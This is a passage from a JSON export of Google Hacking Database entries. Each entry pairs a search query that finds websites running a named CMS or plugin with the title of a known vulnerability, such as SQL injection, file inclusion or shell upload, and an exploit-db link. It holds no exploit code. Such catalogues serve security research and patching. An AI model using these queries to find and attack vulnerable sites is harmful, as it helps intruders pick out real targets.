"http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+Orbis+CMS", "shortDescription": "Powered by Orbis CMS", "textualDescription": "Orbis CMS 1.0 (AFD/ADF/ASU/SQL) Multiple Remote Vulnerabilities: http://www.exploit-db.com/exploits/9309" }, { "signatureReferenceNumber": "3176", "link": "https://www.exploit-db.com/ghdb/3176/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22index.php%3Fedicion_id%3D%22", "shortDescription": "inurl:\"index.php?edicion_id=\"", "textualDescription": "Delivering Digital Media CMS SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12840" }, { "signatureReferenceNumber": "3177", "link": "https://www.exploit-db.com/ghdb/3177/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22CIHUY%22", "shortDescription": "inurl:\"CIHUY\"", "textualDescription": "Joomla Component (com_joomdle) SQL Injection Vulnerability - CVE: 2010-2908: http://www.exploit-db.com/exploits/14466" }, { "signatureReferenceNumber": "3178", "link": "https://www.exploit-db.com/ghdb/3178/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22/subcat.php%3Fcate_id%3D%22", "shortDescription": "\"/subcat.php?cate_id=\"", "textualDescription": "AJ Forum 1.0 (topic_title.php) Remote SQL Injection - CVE: 2007-1295: http://www.exploit-db.com/exploits/3411" }, { "signatureReferenceNumber": "3179", "link": "https://www.exploit-db.com/ghdb/3179/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+Marinet", "shortDescription": "Powered by Marinet", "textualDescription": "Marinet cms SQL/XSS/HTML Injection Vulnerability: http://www.exploit-db.com/exploits/12577" }, { "signatureReferenceNumber": "3181", "link": "https://www.exploit-db.com/ghdb/3181/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=allinurl:clientsignup.php+%22classifieds%22", "shortDescription": "allinurl:clientsignup.php \"classifieds\"", "textualDescription": "Living Local 1.1 (XSS-RFU) Multiple Remote Vulnerabilities - CVE: 2008-6530: http://www.exploit-db.com/exploits/7408" }, { "signatureReferenceNumber": "3182", "link": "https://www.exploit-db.com/ghdb/3182/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+TeamCal+Pro", "shortDescription": "Powered by TeamCal Pro", "textualDescription": "TeamCalPro 3.1.000 Multiple Remote/Local File Inclusion Vulnerabilities - CVE: 2007-6553: http://www.exploit-db.com/exploits/4785" }, { "signatureReferenceNumber": "3188", "link": "https://www.exploit-db.com/ghdb/3188/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22mumbo+jumbo+media%22+%2B+inurl:%22index.php%22", "shortDescription": "\"mumbo jumbo media\" + inurl:\"index.php\"", "textualDescription": "Mumbo Jumbo Media OP4 Remote Blind SQL Injection - CVE: 2008-6477: http://www.exploit-db.com/exploits/5440" }, { "signatureReferenceNumber": "3189", "link": "https://www.exploit-db.com/ghdb/3189/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22cal_day.php%3Fop%3Dday%26catview%3D%22", "shortDescription": "inurl:\"cal_day.php?op=day&catview=\"", "textualDescription": "Calendarix v0.8.20071118 SQL Injection: http://www.exploit-db.com/exploits/11443" }, { "signatureReferenceNumber": "3190", "link": "https://www.exploit-db.com/ghdb/3190/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=intext:%22pLink+2.07%22", "shortDescription": "intext:\"pLink 2.07\"", "textualDescription": "pLink 2.07 (linkto.php id) Remote Blind SQL Injection - CVE: 2008-4357: http://www.exploit-db.com/exploits/6449" }, { "signatureReferenceNumber": "3191", "link": "https://www.exploit-db.com/ghdb/3191/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=netGitar.com+-+Shop+v1.0", "shortDescription": "netGitar.com - Shop v1.0", "textualDescription": "Net Gitar Shopv1.0 DB Download Vulnerability: http://www.exploit-db.com/exploits/11016" }, { "signatureReferenceNumber": "3192", "link": "https://www.exploit-db.com/ghdb/3192/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=allinurl:fullview.php%3Ftempid%3D", "shortDescription": "allinurl:fullview.php?tempid=", "textualDescription": "Template Seller Pro 3.25 (tempid) Remote SQL Injection: http://www.exploit-db.com/exploits/12360" }, { "signatureReferenceNumber": "3194", "link": "https://www.exploit-db.com/ghdb/3194/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+Scripteen+Free+Image+Hosting+Script+V1.2%22", "shortDescription": "\"Powered by Scripteen Free Image Hosting Script V1.2\"", "textualDescription": "Scripteen Free Image Hosting Script 1.2 (cookie) Pass Grabber - CVE: 2008-3211: http://www.exploit-db.com/exploits/6070" }, { "signatureReferenceNumber": "3195", "link": "https://www.exploit-db.com/ghdb/3195/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=allinurl:casting_view.php%3Fadnum%3D", "shortDescription": "allinurl:casting_view.php?adnum=", "textualDescription": "Modelbook (casting_view.php) SQL Injection Vulnerability - CVE: 2010-1705: http://www.exploit-db.com/exploits/12443" }, { "signatureReferenceNumber": "3196", "link": "https://www.exploit-db.com/ghdb/3196/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=www.stwc-counter.de", "shortDescription": "www.stwc-counter.de", "textualDescription": "STWC-Counter" }, { "signatureReferenceNumber": "3197", "link": "https://www.exploit-db.com/ghdb/3197/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=[+Powered+by:+RadLance+v7.5+]", "shortDescription": "[ Powered by: RadLance v7.5 ]", "textualDescription": "RadLance Gold 7.5 Multiple Remote Vulnerabilities - CVE: 2009-4692: http://www.exploit-db.com/exploits/9195" }, { "signatureReferenceNumber": "3199", "link": "https://www.exploit-db.com/ghdb/3199/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:/jobsearchengine/", "shortDescription": "inurl:/jobsearchengine/", "textualDescription": "I-net Multi User Email Script SQLi Vulnerability: http://www.exploit-db.com/exploits/14095" }, { "signatureReferenceNumber": "3201", "link": "https://www.exploit-db.com/ghdb/3201/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=VevoCart+Control+System", "shortDescription": "VevoCart Control System", "textualDescription": "Asp VevoCart Control System Version 3.0.4 DB Download Vulnerability: http://www.exploit-db.com/exploits/11134" }, { "signatureReferenceNumber": "3203", "link": "https://www.exploit-db.com/ghdb/3203/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22com_digifolio%22", "shortDescription": "inurl:\"com_digifolio\"", "textualDescription": "Joomla Component com_digifolio 1.52 (id) SQL Injection Vulnerability - CVE: 2009-3193: http://www.exploit-db.com/exploits/9534" }, { "signatureReferenceNumber": "3204", "link": "https://www.exploit-db.com/ghdb/3204/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22index.php%3Foption%3Dcom_resman%22", "shortDescription": "\"index.php?option=com_resman\"", "textualDescription": "Joomla Component Car Manager 1.1 Remote SQL Injection - CVE: 2007-1704: http://www.exploit-db.com/exploits/3564" }, { "signatureReferenceNumber": "3205", "link": "https://www.exploit-db.com/ghdb/3205/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=allinurl:offers_buy.php%3Fid%3D", "shortDescription": "allinurl:offers_buy.php?id=", "textualDescription": "EC21 Clone 3.0 (id) SQL Injection Vulnerability - CVE: 2010-1726: http://www.exploit-db.com/exploits/12459" }, { "signatureReferenceNumber": "3206", "link": "https://www.exploit-db.com/ghdb/3206/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:/jobsearchengine/", "shortDescription": "inurl:/jobsearchengine/", "textualDescription": "I-net Multi User Email Script SQLi Vulnerability: http://www.exploit-db.com/exploits/14129" }, { "signatureReferenceNumber": "3207", "link": "https://www.exploit-db.com/ghdb/3207/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+CMScout+(c)2005+CMScout+Group", "shortDescription": "Powered by CMScout (c)2005 CMScout Group", "textualDescription": "CMScout 2.08 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12407" }, { "signatureReferenceNumber": "3208", "link": "https://www.exploit-db.com/ghdb/3208/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22index.php%3Foption%3Dcom_rwcards%22", "shortDescription": "\"index.php?option=com_rwcards\"", "textualDescription": "Joomla Component RWCards 2.4.3 Remote SQL Injection - CVE: 2007-1703: http://www.exploit-db.com/exploits/3565" }, { "signatureReferenceNumber": "3209", "link": "https://www.exploit-db.com/ghdb/3209/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:/jobsearchengine/", "shortDescription": "inurl:/jobsearchengine/", "textualDescription": "I-net Multi User Email Script SQLi Vulnerability: http://www.exploit-db.com/exploits/14114" }, { "signatureReferenceNumber": "3210", "link": "https://www.exploit-db.com/ghdb/3210/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+Comersus+v6+Shopping+Cart", "shortDescription": "Powered by Comersus v6 Shopping Cart", "textualDescription": "Comersus Shopping Cart v6 Remote User Pass: http://www.exploit-db.com/exploits/7736" }, { "signatureReferenceNumber": "3211", "link": "https://www.exploit-db.com/ghdb/3211/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=intext:%22Powered+by+Atomic+Photo+Album+1.1.0pre4%22", "shortDescription": "intext:\"Powered by Atomic Photo Album 1.1.0pre4\"", "textualDescription": "Atomic Photo Album 1.1.0pre4 Blind SQL Injection - CVE: 2008-4335: http://www.exploit-db.com/exploits/6574" }, { "signatureReferenceNumber": "3212", "link": "https://www.exploit-db.com/ghdb/3212/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22com_fastball%22", "shortDescription": "inurl:\"com_fastball\"", "textualDescription": "Joomla Fastball component 1.1.0-1.2 SQL Injection - CVE: 2009-3443: http://www.exploit-db.com/exploits/9822" }, { "signatureReferenceNumber": "3216", "link": "https://www.exploit-db.com/ghdb/3216/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+MobPartner%22+inurl:%22chat.php%22", "shortDescription": "\"Powered by MobPartner\" inurl:\"chat.php\"", "textualDescription": "MobPartner Chat Multiple Sql Injection Vulnerabilities: http://www.exploit-db.com/exploits/11321" }, { "signatureReferenceNumber": "3217", "link": "https://www.exploit-db.com/ghdb/3217/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=[+Content+Copyright+%C3%82%C2%A9+2007+RadNics+Gold+]", "shortDescription": "[ Content Copyright \u00c2\u00a9 2007 RadNics Gold ]", "textualDescription": "RadNICS Gold v5 Multiple Remote Vulnerabilities - CVE: 2009-4696: http://www.exploit-db.com/exploits/9196" }, { "signatureReferenceNumber": "3218", "link": "https://www.exploit-db.com/ghdb/3218/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22index.php%3Foption%3Dcom_news_portal%22+or+%22Powered+by+iJoomla+News+Portal%22", "shortDescription": "\"index.php?option=com_news_portal\" or \"Powered by iJoomla News Portal\"", "textualDescription": "iJoomla News Portal (Itemid) Remote SQL Injection - CVE: 2008-2676: http://www.exploit-db.com/exploits/5761" }, { "signatureReferenceNumber": "3219", "link": "https://www.exploit-db.com/ghdb/3219/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Lebi+soft+Ziyaretci+Defteri_v7.5", "shortDescription": "Lebi soft Ziyaretci Defteri_v7.5", "textualDescription": "Lebi soft Ziyaretci Defteri_v7.5 DB Download Vulnerabilit - CVE: 2010-1065: http://www.exploit-db.com/exploits/11015" }, { "signatureReferenceNumber": "3220", "link": "https://www.exploit-db.com/ghdb/3220/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=allinurl:offers_buy.php%3Fid%3D", "shortDescription": "allinurl:offers_buy.php?id=", "textualDescription": "Alibaba Clone Platinum (offers_buy.php) SQL Injection Vulnerability - CVE: 2010-1725: http://www.exploit-db.com/exploits/12468" }, { "signatureReferenceNumber": "3221", "link": "https://www.exploit-db.com/ghdb/3221/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=[+Powered+by:+RadBids+Gold+v4+]", "shortDescription": "[ Powered by: RadBids Gold v4 ]", "textualDescription": "RadBIDS GOLD v4 Multiple Remote Vulnerabilities - CVE: 2009-3529: http://www.exploit-db.com/exploits/9194" }, { "signatureReferenceNumber": "3222", "link": "https://www.exploit-db.com/ghdb/3222/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22/subcat.php%3Fcate_id%3D%22", "shortDescription": "\"/subcat.php?cate_id=\"", "textualDescription": "AJ Auction Pro All Versions (subcat.php) Remote SQL Injection - CVE: 2007-1298: http://www.exploit-db.com/exploits/3408" }, { "signatureReferenceNumber": "3223", "link": "https://www.exploit-db.com/ghdb/3223/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Desenvolvido+por:+Fio+Mental%22", "shortDescription": "\"Desenvolvido por: Fio Mental\"", "textualDescription": "Fiomental & Coolsis Backoffice Multi Vulnerability: http://www.exploit-db.com/exploits/12563" }, { "signatureReferenceNumber": "3224", "link": "https://www.exploit-db.com/ghdb/3224/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+ProjectCMS%22", "shortDescription": "\"Powered by ProjectCMS\"", "textualDescription": "ProjectCMS 1.0b (index.php sn) Remote SQL Injection Vulnerability - CVE: 2009-1500: http://www.exploit-db.com/exploits/8565" }, { "signatureReferenceNumber": "3225", "link": "https://www.exploit-db.com/ghdb/3225/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+DorsaCms", "shortDescription": "Powered by DorsaCms", "textualDescription": "DorsaCms (ShowPage.aspx) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/6810" }, { "signatureReferenceNumber": "3226", "link": "https://www.exploit-db.com/ghdb/3226/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=powered+by+QT-cute+v1.2", "shortDescription": "powered by QT-cute v1.2", "textualDescription": "QuickTalk v1.2 (Source code disclosure) Multiple Vulnerabilities: http://www.exploit-db.com/exploits/12817" }, { "signatureReferenceNumber": "3227", "link": "https://www.exploit-db.com/ghdb/3227/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22/modules/friendfinder/%22", "shortDescription": "inurl:\"/modules/friendfinder/\"", "textualDescription": "XOOPS Module Friendfinder" }, { "signatureReferenceNumber": "3228", "link": "https://www.exploit-db.com/ghdb/3228/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=allinurl:forum_answer.php%3Fque_id%3D", "shortDescription": "allinurl:forum_answer.php?que_id=", "textualDescription": "AskMe Pro 2.1 (que_id) SQL Injection Vulnerability - CVE: 2007-4085: http://www.exploit-db.com/exploits/12372" }, { "signatureReferenceNumber": "3229", "link": "https://www.exploit-db.com/ghdb/3229/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%C2%A9+1998+-+2010+Video+Battle+Script", "shortDescription": "\u00a9 1998 - 2010 Video Battle Script", "textualDescription": "PHP Video Battle SQL Injection Vulnerability - CVE: 2010-1701: http://www.exploit-db.com/exploits/12444" }, { "signatureReferenceNumber": "3230", "link": "https://www.exploit-db.com/ghdb/3230/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22com_facebook%22", "shortDescription": "inurl:\"com_facebook\"", "textualDescription": "Joomla com_facebook SQL Injection - CVE: 2009-3438: http://www.exploit-db.com/exploits/9833" }, { "signatureReferenceNumber": "3231", "link": "https://www.exploit-db.com/ghdb/3231/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:/modules/kshop/", "shortDescription": "inurl:/modules/kshop/", "textualDescription": "XOOPS Module Kshop 1.17 (id) Remote SQL Injectio - CVE: 2007-1810: http://www.exploit-db.com/exploits/3626" }, { "signatureReferenceNumber": "3233", "link": "https://www.exploit-db.com/ghdb/3233/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Jinzora+Media+Jukebox%22", "shortDescription": "\"Jinzora Media Jukebox\"", "textualDescription": "Jinzora 2.7 (include_path) Multiple Remote File Include Vulnerabilities - CVE: 2006-6770: http://www.exploit-db.com/exploits/3003" }, { "signatureReferenceNumber": "3234", "link": "https://www.exploit-db.com/ghdb/3234/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+EPay+Enterprise%22+inurl:%22shop.htm%3Fcid%3D%22+|+nurl:%22shop.php%3Fcid%3D%22", "shortDescription": "\"Powered by EPay Enterprise\" inurl:\"shop.htm?cid=\" | nurl:\"shop.php?cid=\"", "textualDescription": "EPay Enterprise v4.13 (cid) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12353" }, { "signatureReferenceNumber": "3235", "link": "https://www.exploit-db.com/ghdb/3235/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Copyright+2004+easy-content+forums%22", "shortDescription": "\"Copyright 2004 easy-content forums\"", "textualDescription": "Easy-Content Forums 1.0 Multiple SQL/XSS Vulnerabilities - CVE: 2006-2697: http://www.exploit-db.com/exploits/1834" }, { "signatureReferenceNumber": "3236", "link": "https://www.exploit-db.com/ghdb/3236/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Website+by+WebSolutions.ca%22", "shortDescription": "\"Website by WebSolutions.ca\"", "textualDescription": "WsCMS SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12813" }, { "signatureReferenceNumber": "3238", "link": "https://www.exploit-db.com/ghdb/3238/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:/modules/tinyevent/", "shortDescription": "inurl:/modules/tinyevent/", "textualDescription": "XOOPS Module Tiny Event 1.01 (id) Remote SQL Injection - CVE: 2007-1811: http://www.exploit-db.com/exploits/3625" }, { "signatureReferenceNumber": "3239", "link": "https://www.exploit-db.com/ghdb/3239/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by:+AIH+v2.1", "shortDescription": "Powered by: AIH v2.1", "textualDescription": "Advanced Image Hosting (AIH) 2.1 Remote SQL Injection - CVE: 2008-2536: http://www.exploit-db.com/exploits/5601" }, { "signatureReferenceNumber": "3240", "link": "https://www.exploit-db.com/ghdb/3240/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22/modules/jobs/%22", "shortDescription": "inurl:\"/modules/jobs/\"", "textualDescription": "XOOPS Module Jobs 2.4 (cid) Remote SQL Injection - CVE: 2007-2370: http://www.exploit-db.com/exploits/3672" }, { "signatureReferenceNumber": "3241", "link": "https://www.exploit-db.com/ghdb/3241/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Uploader+des+fichiers", "shortDescription": "Uploader des fichiers", "textualDescription": "Service d'upload v1.0.0 Shell Upload Vulnerability: http://www.exploit-db.com/exploits/10938" }, { "signatureReferenceNumber": "3242", "link": "https://www.exploit-db.com/ghdb/3242/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=[+Powered+By+x10media.com+]", "shortDescription": "[ Powered By x10media.com ]", "textualDescription": "x10 Media Adult Script 1.7 Multiple Remote Vulnerabilities - CVE: 2009-4730: http://www.exploit-db.com/exploits/9340" }, { "signatureReferenceNumber": "3243", "link": "https://www.exploit-db.com/ghdb/3243/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:/modules/camportail/", "shortDescription": "inurl:/modules/camportail/", "textualDescription": "XOOPS Module Camportail 1.1 (camid) Remote SQL Injection - CVE: 2007-1808: http://www.exploit-db.com/exploits/3629" }, { "signatureReferenceNumber": "3244", "link": "https://www.exploit-db.com/ghdb/3244/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Copyright+%C2%A9+2007+by+Horst-D.+Kr%C3%B6ller+%C2%B7+CMS:+php+WCMS", "shortDescription": "Copyright \u00a9 2007 by Horst-D. Kr\u00f6ller \u00b7 CMS: php WCMS", "textualDescription": "php wcms XT 0.0.7 Multiple Remote File Inclusion Vulnerabilities - CVE: 2007-5185: http://www.exploit-db.com/exploits/4477" }, { "signatureReferenceNumber": "3245", "link": "https://www.exploit-db.com/ghdb/3245/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22com_booklibrary%22", "shortDescription": "inurl:\"com_booklibrary\"", "textualDescription": "Joomla Book Library 1.0 file inclusion - CVE: 2009-3817: http://www.exploit-db.com/exploits/9889" }, { "signatureReferenceNumber": "3246", "link": "https://www.exploit-db.com/ghdb/3246/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22/modules/myads/%22", "shortDescription": "inurl:\"/modules/myads/\"", "textualDescription": "XOOPS Module MyAds Bug Fix 2.04jp (index.php) SQL Injection - CVE: 2007-1846: http://www.exploit-db.com/exploits/3603" }, { "signatureReferenceNumber": "3247", "link": "https://www.exploit-db.com/ghdb/3247/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Powered+by+Nukedit%22", "shortDescription": "\"Powered by Nukedit\"", "textualDescription": "Nukedit 4.9.x Remote Create Admin Exploit - CVE: 2008-5582: http://www.exploit-db.com/exploits/5192" }, { "signatureReferenceNumber": "3248", "link": "https://www.exploit-db.com/ghdb/3248/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22Ladder+Scripts+by+http://www.mygamingladder.com%22", "shortDescription": "\"Ladder Scripts by http://www.mygamingladder.com\"", "textualDescription": "My Gaming Ladder Combo System 7.0 Remote Code Execution - CVE: 2006-2002: http://www.exploit-db.com/exploits/1707" }, { "signatureReferenceNumber": "3249", "link": "https://www.exploit-db.com/ghdb/3249/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+By+PHPDug+version+2.0.0", "shortDescription": "Powered By PHPDug version 2.0.0", "textualDescription": "PHPDug version 2.0.0 Cross Site Scripting Vulnerability: http://www.exploit-db.com/exploits/11017" }, { "signatureReferenceNumber": "3250", "link": "https://www.exploit-db.com/ghdb/3250/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=allinurl:show_memorial.php%3Fid%3D", "shortDescription": "allinurl:show_memorial.php?id=", "textualDescription": "Memorial Web Site Script (id) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12351" }, { "signatureReferenceNumber": "3251", "link": "https://www.exploit-db.com/ghdb/3251/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=intext:Powered+by+Mobilelib+Gold+v3", "shortDescription": "intext:Powered by Mobilelib Gold v3", "textualDescription": "Mobilelib Gold v3 (Auth Bypass/SQL) Multiple Remote Vulnerabilities - CVE: 2009-2788: http://www.exploit-db.com/exploits/9327" }, { "signatureReferenceNumber": "3252", "link": "https://www.exploit-db.com/ghdb/3252/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22php-addressbook%22", "shortDescription": "\"php-addressbook\"", "textualDescription": "PHP-Address Book 4.0.x Multiple SQL Injection Vulnerabilities - CVE: 2008-2565: http://www.exploit-db.com/exploits/9023" }, { "signatureReferenceNumber": "3253", "link": "https://www.exploit-db.com/ghdb/3253/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22com_jsjobs%22", "shortDescription": "inurl:\"com_jsjobs\"", "textualDescription": "Joomla Component com_jsjobs 1.0.5.6 SQL Injection Vulnerabilities - CVE: 2009-4599: http://www.exploit-db.com/exploits/10366" }, { "signatureReferenceNumber": "3254", "link": "https://www.exploit-db.com/ghdb/3254/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:com_iproperty", "shortDescription": "inurl:com_iproperty", "textualDescription": "Joomla Component com_iproperty 1.5.3 (id) SQL Injection Vulnerability - CVE: 2010-1721: http://www.exploit-db.com/exploits/12246" }, { "signatureReferenceNumber": "3255", "link": "https://www.exploit-db.com/ghdb/3255/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=index.php%3Foption%3Dcom_altas", "shortDescription": "index.php?option=com_altas", "textualDescription": "Joomla Component altas 1.0 Multiple Remote SQL Injection: http://www.exploit-db.com/exploits/6002" }, { "signatureReferenceNumber": "3256", "link": "https://www.exploit-db.com/ghdb/3256/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22index.php%3Fmodule%3DpnFlashGames%22", "shortDescription": "inurl:\"index.php?module=pnFlashGames\"", "textualDescription": "PostNuke Module pnFlashGames 2.5 SQL Injection Vulnerabilities - CVE: 2008-2013: http://www.exploit-db.com/exploits/5500" }, { "signatureReferenceNumber": "3257", "link": "https://www.exploit-db.com/ghdb/3257/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Design+by+Satcom+Co", "shortDescription": "Design by Satcom Co", "textualDescription": "Eshopbuilde CMS SQL Injection Vulnerability - CVE: 2009-4155: http://www.exploit-db.com/exploits/10253" }, { "signatureReferenceNumber": "3258", "link": "https://www.exploit-db.com/ghdb/3258/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=intitle:%22ppc+engine+admin+login+form%22", "shortDescription": "intitle:\"ppc engine admin login form\"", "textualDescription": "PPC Search Engine 1.61 (INC) Multiple Remote File Include Vulnerabilities - CVE: 2007-0167: http://www.exploit-db.com/exploits/3104" }, { "signatureReferenceNumber": "3260", "link": "https://www.exploit-db.com/ghdb/3260/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=%22powered+by+Albinator%22", "shortDescription": "\"powered by Albinator\"", "textualDescription": "Albinator 2.0.6 (Config_rootdir) Remote File Inclusion - CVE: 2006-2182: http://www.exploit-db.com/exploits/1744" }, { "signatureReferenceNumber": "3262", "link": "https://www.exploit-db.com/ghdb/3262/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=Powered+by+Gbook+MX+v4.1.0+%C2%A92003+Magtrb+Soft", "shortDescription": "Powered by Gbook MX v4.1.0 \u00a92003 Magtrb Soft", "textualDescription": "Gbook MX v4.1.0 Arabic Version File Inclusion Vulnerability: http://www.exploit-db.com/exploits/10986" }, { "signatureReferenceNumber": "3263", "link": "https://www.exploit-db.com/ghdb/3263/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22/modules/library/%22", "shortDescription": "inurl:\"/modules/library/\"", "textualDescription": "XOOPS Module Library (viewcat.php) Remote SQL Injectio - CVE: 2007-1815: http://www.exploit-db.com/exploits/3619" }, { "signatureReferenceNumber": "3264", "link": "https://www.exploit-db.com/ghdb/3264/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=inurl:%22/modules/repository/%22", "shortDescription": "inurl:\"/modules/repository/\"", "textualDescription": "XOOPS Module Repository (viewcat.php) Remote SQL Injection - CVE: 2007-1847: http://www.exploit-db.com/exploits/3612" }, { "signatureReferenceNumber": "3265", "link": "https://www.exploit-db.com/ghdb/3265/", "category": "Advisories and Vulnerabilities", 